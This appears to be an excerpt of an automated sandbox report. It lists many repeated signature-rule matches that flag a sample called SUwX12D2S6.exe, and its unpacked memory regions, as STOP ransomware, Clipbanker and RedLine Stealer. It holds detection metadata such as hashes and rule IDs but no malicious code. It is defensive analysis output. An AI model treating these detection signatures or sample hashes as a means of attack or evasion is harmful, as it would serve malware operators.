Source: 6.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.SUwX12D2S6.exe.5e615a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.SUwX12D2S6.exe.5e615a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.SUwX12D2S6.exe.5e115a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.SUwX12D2S6.exe.5e115a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.SUwX12D2S6.exe.5ed15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.SUwX12D2S6.exe.5ed15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.2.SUwX12D2S6.exe.5e715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.2.SUwX12D2S6.exe.5e715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.SUwX12D2S6.exe.5ed15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.SUwX12D2S6.exe.5ed15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.SUwX12D2S6.exe.5e615a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.SUwX12D2S6.exe.5e615a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.2.SUwX12D2S6.exe.5e715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.2.SUwX12D2S6.exe.5e715a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 3.2.SUwX12D2S6.exe.5de15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 3.2.SUwX12D2S6.exe.5de15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 3.2.SUwX12D2S6.exe.5de15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 3.2.SUwX12D2S6.exe.5de15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001A.00000002.2348561919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001A.00000002.2348561919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000B.00000002.1848011665.0000000004483000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001E.00000002.3584250955.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001E.00000002.3584250955.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001C.00000002.2974032073.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001C.00000002.2974032073.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001F.00000002.3583753662.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001F.00000002.3583753662.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000014.00000002.4129162040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000014.00000002.4129162040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000000.00000002.1676946978.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.1676862648.000000000459B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000002.2350347697.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000019.00000002.2350347697.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000005.00000002.1719190222.0000000004544000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.1701561007.000000000442E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.1719252737.0000000005E60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000013.00000002.2019412066.00000000009BC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.2243904603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000004.00000002.2243904603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000002.1694613073.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000002.1694613073.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001D.00000002.2973232719.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001D.00000002.2973232719.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000013.00000002.2019239112.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000013.00000002.2019239112.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001C.00000002.2974276962.00000000009A0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.1913660685.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
